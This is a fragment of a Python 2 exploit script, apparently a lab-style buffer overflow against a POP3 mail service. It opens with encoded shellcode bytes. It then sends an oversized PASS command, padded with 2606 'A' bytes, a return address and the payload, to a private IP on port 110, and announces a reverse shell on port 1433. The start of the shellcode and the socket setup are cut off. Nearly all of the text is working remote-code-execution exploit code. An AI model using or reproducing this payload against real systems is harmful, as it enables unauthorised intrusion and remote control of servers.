buf += "\xc8\x57\x54\xc8\x15\x24\x9d\xf4\xf2\x7b\xc6\xc3\xfa"
buf += "\xa7\x4f\x5c\x1f\xd2\x4d\xec\x0d\x07\x26\xf4\x9b\x6b"
buf += "\x10\xf4\xfa\xa7\xa2\xff\x06\xba\xb2\x2b\xe6\x25\x9d"
buf += "\xcb\x5a\x28\xd8\xb0\x5c\x24\x28\x61\x0d\x19\xf6\x86"
buf += "\x39\x73\xcb\x11\x2f\xfa\xa2\x64\x05\x36\x9e\xcc\x3d"
buf += "\x88\xe4\xe4\x53\x3c\x9c\xca\x38\x88\xda\xdb\xc9\x4d"
buf += "\x4c\x63\xbe\x57\x52\xec\x53\x34\x35\xac\x03\xd6\x35"
buf += "\xbf\x65\x8d\x1f\x27\x9b\x6b\x10\xf4\x6d\xd4\x5f\x21"
buf += "\xf6\x21\x67\x9e\x03\x0e\xc0\x1c\x90\x3e\xc7\xa7\xbe"
buf += "\x35\xd9\xee\x04\xb4\xb2\xf1\xfa\xa7\xca\x9c\x6b\xde"
buffer = '\x41' * 2606
try:
print "\nSending payload"
s.connect(('192.168.250.158',110))
data = s.recv(1024)
s.send('USER root' +'\r\n')
data = s.recv(1024)
print(str(data))
s.send('PASS ' + buffer + '\x8f\x35\x4a\x5f'+ buf + '\r\n')
data = s.recv(1024)
print(str(data))
s.close()
print "\nDone! see rev shell on 1433"
except:
print "Could not connect to POP3!"
| 44.215686 | 63 | 0.659436 |